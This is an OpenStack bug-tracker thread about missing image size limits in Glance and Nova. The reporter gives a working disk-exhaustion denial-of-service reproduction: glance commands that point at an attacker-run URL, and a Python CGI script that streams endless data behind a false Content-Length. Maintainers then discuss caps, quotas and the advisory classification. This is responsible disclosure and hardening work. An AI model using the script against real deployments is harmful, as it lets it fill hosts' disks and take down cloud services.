No limits on image size

Bug #1029950 reported by Derek Higgins
This bug affects 1 person
Affects                      Status     Importance  Assigned to  Milestone
Glance                       Opinion    Undecided   Unassigned
OpenStack Compute (nova)     Opinion    Medium      Unassigned
OpenStack Security Advisory  Won't Fix  Undecided   Unassigned

Bug Description

Using EPEL Essex packages on RHEL 6.3.

Glance should impose configurable limits (or tenant quotas) on the size of the images it allows to be registered and/or uploaded.

Two separate example exploits are described here:
1. Glance Denial of Service by file system exhaustion
2. Nova Compute Denial of Service by file system exhaustion

= 1 =

Using the glance x-image-meta-property-copy-from header it is possible to get glance to keep downloading a large resource until it fills up the local hard drive, e.g.

$ glance add name="big image" disk_format=raw container_format=ovf copy_from=http://server/cgi-bin/t.cgi # [1]
Failed to add image. Got error:
The request returned a 413 Request Entity Too Large. This generally means that rate limiting or a quota threshold was breached.

The response body:
413 Request Entity Too Large

The body of your request was too large for this server.

 Image storage media is full: There is not enough disk space on the image storage media.
Note: Your image metadata may still be in the registry, but the image's status will likely be 'killed'.

$ ls -lh /var/lib/glance/images/f1db6d09-1eac-4ce4-86ff-8a34bfea33af
-rw-r--r--. 1 glance glance 87G Jul 27 13:03 /var/lib/glance/images/f1db6d09-1eac-4ce4-86ff-8a34bfea33af
$ df -h /var/lib/glance/images/
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_rheva8c03-lv_root
                      104G 98G 261M 100% /

This would allow any authenticated user to perform a denial of service on a glance server with a file system backend. I haven't looked into swift, but will it just keep going until it starts filling up storage nodes?

= 2 =

Nova is also open to a similar exploit. By using the x-image-meta-location header in a glance add, a large resource can be registered with glance; any nova compute node that tries to use this image to start an instance can have its disk space very quickly exhausted by a single instance.

# Registering an image 1 TB in size (can go bigger if need be)
$ glance add name="big image" disk_format=raw container_format=ovf location=http://server/cgi-bin/t.cgi
Added new image with ID: 1a528173-7ca9-4320-b0f3-dac127a1f337

$ glance index
ID Name Disk Format Container Format Size
------------------------------------ ------------------------------ -------------------- -------------------- --------------
1a528173-7ca9-4320-b0f3-dac127a1f337 big image raw ovf 1099511627776

$ nova boot --flavor 1 --image 1a528173-7ca9-4320-b0f3-dac127a1f337 bigtest

# the filesystem now fills up, the boot fails and nova deletes the partial download
# next I check the apache logs to see how much nova downloaded.
"GET /cgi-bin/t.cgi HTTP/1.1" 200 93406637550 "-" "-"
# Note: I know I will probably not get the same compute node next time but
# this will at least give me an idea of what size might be tolerated.
# Edit cgi script [1] to change the Content-Length to something slightly smaller than 93406637550
$ glance add name="smaller big image" disk_format=raw container_format=ovf location=http://server/cgi-bin/t.cgi
Added new image with ID: a5eb1eab-1536-438f-82cf-4b642cf9d363
$ glance index
ID Name Disk Format Container Format Size
------------------------------------ ------------------------------ -------------------- -------------------- --------------
a5eb1eab-1536-438f-82cf-4b642cf9d363 smaller big image raw ovf 90406637550
1a528173-7ca9-4320-b0f3-dac127a1f337 big image raw ovf 1099511627776

$ nova boot --flavor 1 --image a5eb1eab-1536-438f-82cf-4b642cf9d363 bigtest_2

$ ls -lh /var/lib/nova/instances/_base/7f9a4e3c2891c537a784391cd962e6a5527d0a27
-rw-r--r--. 1 qemu qemu 85G Jul 27 14:13 /var/lib/nova/instances/_base/7f9a4e3c2891c537a784391cd962e6a5527d0a27
$ df -h /var/lib/nova/instances/_base/
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_rheva8c03-lv_root
                      104G 97G 1.1G 99% /
$

[1] Standard HTTP CGI script used as the VM image:
#!/usr/bin/python
import os, sys, uuid

print "Content-Type: text/html"
#print "Content-Length: 1099511627776" # this shouldn't be present for first exploit
print

data = ''.join(uuid.uuid4().hex for a in range(500))
if os.environ.get('REQUEST_METHOD') == "GET":
    while 1:
        print data
        sys.stdout.flush()

Revision history for this message
Thierry Carrez (ttx) wrote :

Adding Brian Waldon and Vish to confirm impact

Revision history for this message
Brian Waldon (bcwaldon) wrote :

Actually, Glance caps image data at 1 PiB, assuming it can tell how big an image is. That's probably larger than most systems can handle anyway, so would you just like to make that configurable?
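
For illustration, a minimal sketch of what enforcing such a cap could look like when the data is streamed, so the check also works when no Content-Length is supplied; this is not Glance's actual code, and the cap value and helper names are placeholders:

IMAGE_SIZE_CAP = 10 * 1024 ** 3  # placeholder value, not the 1 PiB default


class ImageTooLarge(Exception):
    pass


def copy_with_cap(src, dst, cap=IMAGE_SIZE_CAP, chunk_size=64 * 1024):
    """Copy src to dst, aborting once more than `cap` bytes have been read."""
    total = 0
    while True:
        chunk = src.read(chunk_size)
        if not chunk:
            return total
        total += len(chunk)
        if total > cap:
            raise ImageTooLarge("upload exceeds %d bytes" % cap)
        dst.write(chunk)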

Thierry Carrez (ttx)
summary: - Glance doesn't impose any limits on image size
+ No limits on image size
Revision history for this message
Thierry Carrez (ttx) wrote :

I'm not sure this should be considered a vulnerability in Glance. The current model is that you trust the people you give glance upload access to anyway. They can upload a 1 PB image. Or they can upload 1,000,000 1 GB images. Both would result in the same issue: disk space exhaustion. I'd recommend setting up some billing so that anyone tempted to do that would end up paying for it.

For Nova, I tend to agree with you there is an attack path. It could definitely use some protection against "too large" images. This can be set up at Glance level or at Nova level (at the very minimum when an image uses x-image-meta-location).

Changed in glance:
status: New → Incomplete
Changed in nova:
status: New → Incomplete
Revision history for this message
Brian Waldon (bcwaldon) wrote :

Thierry, I want to clarify that it's 1 PiB per image uploaded. I'm thinking that is way too big to be useful, as any reasonable system will be several orders of magnitude smaller.

Revision history for this message
Derek Higgins (derekh) wrote :

Thierry, I see your point about billing the customer for space used in glance, but I still think glance needs protection from a user exhausting all disk space with one HTTP call. Reducing and fully enforcing the limit on image size will do this and also protect Nova, since all images are downloaded via the API.

It looks to me like IMAGE_SIZE_CAP needs to be reduced from 1 PiB to something more reasonable (10 GiB maybe?), and it could also be made configurable (or a tenant quota, though that is probably not suitable if backporting to Essex is considered).

Then all methods of "POST /v1/images" need to respect this value, whether the size is passed as a header with the HTTP POST or calculated while the data is being uploaded if it is not in the headers.

Finally, if using the x-image-meta-location: header, Glance also needs to respect the image size that was registered for an image (to protect it from the image size increasing between registration and usage). Currently it reports the registered size when an HTTP HEAD is done against /v1/images/<uuid> but returns the changed size when an HTTP GET is done, so Nova downloads the new size regardless of what was registered.
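
A minimal sketch of that last point, assuming the registered size is available when the data is fetched (the function and error handling are illustrative, not Glance's actual API):

def read_exactly(src, registered_size, chunk_size=64 * 1024):
    """Yield chunks from src, failing if the stream deviates from registered_size."""
    remaining = registered_size
    while remaining > 0:
        chunk = src.read(min(chunk_size, remaining))
        if not chunk:
            raise IOError("source ended %d bytes short of the registered size"
                          % remaining)
        remaining -= len(chunk)
        yield chunk
    if src.read(1):
        raise IOError("source returned more data than the registered size")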

Revision history for this message
Thierry Carrez (ttx) wrote :

For Glance, I think capping the size of images is a good strengthening measure that should definitely be implemented. I just fail to be convinced that this closes a vulnerability: IMHO it falls in normal usage (yes, you can fill Glance and Swift space if you want to, but should be billed for it). Maybe that's just me, though :)

It's another story for Nova, which should not be DoSed because Glance lets people do weird things. It should implement its own capping/protection IMHO. The x-image-meta-location is even more convenient to exploit for fun and profit; this is a vulnerability and it should be fixed.

I'd really like to hear others' opinions. Russell, Steve, Vish?

Revision history for this message
Vish Ishaya (vishvananda) wrote :

Seems like the real bug here is lack of quota enforcement. We should probably have a quota on disk space usage in both nova and glance (the only exception might be the new swift backend which stores files in each user's container, in which case it is swift's problem). In the short term, a configurable option for max image size makes sense in both nova and glance. Nova might need two: max image size, and max virtual image size.
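
As a rough illustration of the two Nova limits mentioned (downloaded file size versus virtual disk size), a hedged sketch follows; qemu-img's JSON output is real, but the function and limit parameters are hypothetical:

import json
import os
import subprocess


def check_image_sizes(path, max_file_bytes, max_virtual_bytes):
    """Check both the on-disk size and the virtual size of a fetched image."""
    if os.path.getsize(path) > max_file_bytes:
        raise ValueError("image file exceeds the allowed size")
    info = json.loads(subprocess.check_output(
        ["qemu-img", "info", "--output=json", path]))
    if info["virtual-size"] > max_virtual_bytes:
        raise ValueError("image virtual size exceeds the allowed size")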

Revision history for this message
Thierry Carrez (ttx) wrote :

Adding mikal for comment

Revision history for this message
Michael Still (mikal) wrote :

It seems to me that there are two other things at play here:

 - nova-compute shouldn't be fetching images it knows it doesn't have enough disk for, it should be checking and throwing an exception.

 - nova-scheduler shouldn't be handing compute nodes jobs they don't have enough disk for.
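
A minimal sketch of the first point, checking free space before fetching an image; os.statvfs is standard, while the exception and function names are illustrative rather than Nova's actual API:

import os


class NotEnoughSpace(Exception):
    pass


def check_free_space(path, required_bytes):
    """Raise if the filesystem holding `path` has less than required_bytes free."""
    st = os.statvfs(path)
    free = st.f_bavail * st.f_frsize
    if free < required_bytes:
        raise NotEnoughSpace("need %d bytes but only %d free at %s"
                             % (required_bytes, free, path))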

Brian Waldon (bcwaldon)
Changed in glance:
milestone: none → folsom-rc1
status: Incomplete → Triaged
Brian Waldon (bcwaldon)
Changed in glance:
importance: Undecided → Critical
Revision history for this message
Russell Bryant (russellb) wrote :

It does seem like this should be treated as a vulnerability. I took a look at the security advisories we have done this year, and this seems to be at the same level as some other DoS vulnerabilities we have fixed, including:

[OSSA 2012-003] Long server names grow nova-api log files significantly
[OSSA 2012-005] No quota enforced on security group rules
[OSSA 2012-009] Scheduler denial of service through scheduler_hints

For nova, I think a cap on image size makes sense. For glance, is that sufficient to stop someone from filling up disk space? Is there also a limit on how many images you can upload?

Revision history for this message
Brian Waldon (bcwaldon) wrote :

The only limit in glance is the 1 PiB non-configurable max image size. There are no limits on the number of images.

Revision history for this message
Brian Waldon (bcwaldon) wrote :

The configurability of the max allowed image size is addressed in https://review.openstack.org/#/c/11627/. It also fixes a problem where chunked transfer-encoding requests weren't getting checked.

Changed in glance:
status: Triaged → In Progress
assignee: nobody → Brian Waldon (bcwaldon)
Revision history for this message
Brian Waldon (bcwaldon) wrote :

Thierry suggested I file a public bug and fix that with the review I just mentioned - https://bugs.launchpad.net/glance/+bug/1038994.

Changed in glance:
status: In Progress → Incomplete
importance: Critical → Undecided
milestone: folsom-rc1 → none
Revision history for this message
Thierry Carrez (ttx) wrote :

Capping in Glance was publicly fixed.
I propose we consider this a vulnerability in Nova only and do an embargoed fix here.

Steve B., Russell: what do you think ?

Vish, Mikal, Brian: anyone up to propose a Nova fix ? Please attach here.

Changed in nova:
importance: Undecided → Medium
status: Incomplete → Confirmed
Revision history for this message
Russell Bryant (russellb) wrote :

+1 on the proposal to consider this just a vuln in nova and doing the fix here

Revision history for this message
Thierry Carrez (ttx) wrote :

Vish, Mikal, Brian: anyone up to propose a Nova fix ? Ideally it would not introduce a new configuration parameter (at least for stable/*)

Brian Waldon (bcwaldon)
no longer affects: glance
Revision history for this message
Brian Waldon (bcwaldon) wrote :

What fix would be appropriate for Nova? Do we want to check available disk space before any write actions on nova-compute nodes?

Revision history for this message
Thierry Carrez (ttx) wrote :

Adding nova-core to increase the chances this gets fixed in time for RC1

Changed in nova:
milestone: none → folsom-rc1
Revision history for this message
Pádraig Brady (p-draigbrady) wrote :

Eek this is a bit awkward. I'm not sure how to address this TBH, just some notes...

A related nova commit with inline comments on space checking is
https://review.openstack.org/#/c/11399/3

The issue would be mitigated somewhat if nova could always do a HEAD first to get the image size, and check/preallocate that. But Derek's point in comment 5 suggests that the GET might in fact get more. In any case I suppose someone could still start high and reduce the size until they got an image that just filled the disk.

Having a max size per image would help, but not if users could use many such images. That would have to be enforced by quotas/billing.
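
A sketch of the HEAD-first idea, with the caveat above that the later GET can still return more than advertised, so the bound must also be enforced while streaming; urllib is standard, everything else is illustrative:

import urllib.request


def advertised_size(url):
    """Return the Content-Length reported by a HEAD request, or None."""
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req) as resp:
        length = resp.headers.get("Content-Length")
    return int(length) if length is not None else None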

Thierry Carrez (ttx)
Changed in nova:
milestone: folsom-rc1 → none
tags: added: folsom-rc-potential
Revision history for this message
Thierry Carrez (ttx) wrote :

Anyone with a better suggestion? It would be great to cover this one before Folsom is out, but the clock is ticking.

Thierry Carrez (ttx)
tags: added: folsom-backport-potential
removed: folsom-rc-potential
Revision history for this message
Thierry Carrez (ttx) wrote :

Guys, it would be great to come up with a solution for this.

We can deny it's a practical attack vector, saying that nova-compute will survive it ("the filesystem now fills up, the boot fails and nova deletes the partial download"), or come up with a more creative fix...

Revision history for this message
Thierry Carrez (ttx) wrote :

Putting back in scope to discuss what to do with this one.

Changed in ossa:
status: New → Incomplete
Thierry Carrez (ttx)
Changed in ossa:
importance: Undecided → Medium
status: Incomplete → Confirmed
status: Confirmed → Incomplete
importance: Medium → Undecided
Sean Dague (sdague)
no longer affects: glance
Revision history for this message
John Garbutt (johngarbutt) wrote :

From a nova point of view, the maximum size of the image is basically the CoW base image + the max size of the disk.

Bugs in snapshot management could cause other issues, but we don't appear to be talking about that here.

Changed in nova:
status: Confirmed → Incomplete
Joe Gordon (jogo)
Changed in nova:
status: Incomplete → Invalid
Joe Gordon (jogo)
Changed in nova:
status: Invalid → Incomplete
Revision history for this message
Andrew Laski (alaski) wrote :

I'm not sure what's incomplete or invalid here. Are there now measures in Nova that would prevent this case from happening?

It seems to be somewhat alleviated by Glance now being able to enforce a maximum size. But there is no fix for the Nova issue referenced here.

Revision history for this message
John Garbutt (johngarbutt) wrote :

It was my previous comment; I don't understand the concern.

The max size of the snapshot is generally constrained by the max size of the virtual root disk.

It might expand bigger than that due to branching in the disk "snapshot" chain. I wasn't clear, but I was looking for more detail on how you make that chain grow such that the size is unbounded.

But I think I misread this. I guess the idea is to check the snapshot size in glance *before* doing the download, in the hope that glance is not lying about the stated size of the snapshot. I know in the XenAPI driver we check the size, but that is post-download.

Changed in nova:
status: Incomplete → Confirmed
Revision history for this message
Andrew Laski (alaski) wrote :

After digging a bit more I do have some questions on the behavior that's reported here. There is an early check to ensure that the image size is not too large for the flavor being used:

        root_gb = instance_type['root_gb']
        if root_gb:
            if int(image.get('size') or 0) > root_gb * (1024 ** 3):
                raise exception.FlavorDiskTooSmall()

This gives deployers some protection unless they're creating flavors that can be scheduled to computes which can't handle that disk size. Or using root_gb = 0.

It would be great to add some additional protection on computes to ensure that they're not filling their entire filesystem, but I think the impact is somewhat mitigated here.

Revision history for this message
Thierry Carrez (ttx) wrote :

Ok, it feels like this vulnerability is now a bit shallow. I propose we open it on Thursday and turn it into a security-strengthening bug, since it's not really exploitable?

Revision history for this message
Derek Higgins (derekh) wrote :

It's been a while since I looked at this. I'll check to see if the bug that I originally reported is still exploitable; if it's not, opening it up sounds OK to me.

Revision history for this message
Derek Higgins (derekh) wrote :

Confirming this is still relevant: using current trunk I can register a small image with glance
glance image-create --location http://192.168.1.4/cgi-bin/t.cgi --disk-format qcow2 --container-format bare --name testimage
# glance image-list
| af672331-b29c-405f-a714-3fc2dd8b0110 | testimage | qcow2 | bare | 19596947 | active |

Next I change the Content-Length returned by the CGI script, and then when I try to start an instance nova will continue to download the image until its disk space is exhausted:
IOError: [Errno 28] No space left on device
Then the base image is deleted.

This is going through the glance API, which isn't respecting the size of the image that was registered with it.

Also I noticed that the glance image_size_cap can be bypassed by registering a glance image with "--copy-from" and arranging for HEAD to return a different Content-Length than GET.

Revision history for this message
Andrew Laski (alaski) wrote :

Ok, so the real issue here seems to be that it is possible to have Glance provide images which do not conform to the specifications it provides for those images. There is some hardening that could be done within Nova, such as limiting the amount of data downloaded to the image_size specified by Glance. But I think Glance should look into this as well to see what measures can be implemented there.
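
A hedged sketch of that Nova-side hardening, capping the amount of data written at the size Glance reported for the image; the names are illustrative, not Nova's actual download code:

def download_capped(chunks, dst, expected_size):
    """Write image chunks to dst, failing once expected_size is exceeded."""
    written = 0
    for chunk in chunks:
        written += len(chunk)
        if written > expected_size:
            raise IOError("image data exceeds the %d bytes Glance reported"
                          % expected_size)
        dst.write(chunk)
    return written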

Revision history for this message
Thierry Carrez (ttx) wrote :

So, IIUC as far as Nova is concerned, it's the question of whether we should consider vulnerability to a hostile Glance server as a Nova vulnerability. I suspect there are other types of DoS that can be achieved when Nova is paired with a hostile/taken-over Glance server, so I'm not sure we should include that case in our OSSA attack surface...

Revision history for this message
Thierry Carrez (ttx) wrote :

Proposing class C1 -- if your glance server is taken over, image size should be the least of your concerns.
https://wiki.openstack.org/wiki/Vulnerability_Management#Incident_report_taxonomy

Revision history for this message
Jeremy Stanley (fungi) wrote :

Agreed, this is class C1 (not practically exploitable and so not anything for which we should issue a security advisory). If there are no disagreements, I'll switch this to a regular public bug and mark the security advisory task "won't fix" on Thursday.

Revision history for this message
Andrew Laski (alaski) wrote :

No disagreement from me.

Revision history for this message
Jeremy Stanley (fungi) wrote :

It's now (UTC) Thursday.

information type: Private Security → Public
Changed in ossa:
status: Incomplete → Won't Fix
tags: added: security
Joe Gordon (jogo)
Changed in nova:
status: Confirmed → Opinion
Changed in glance:
status: New → Opinion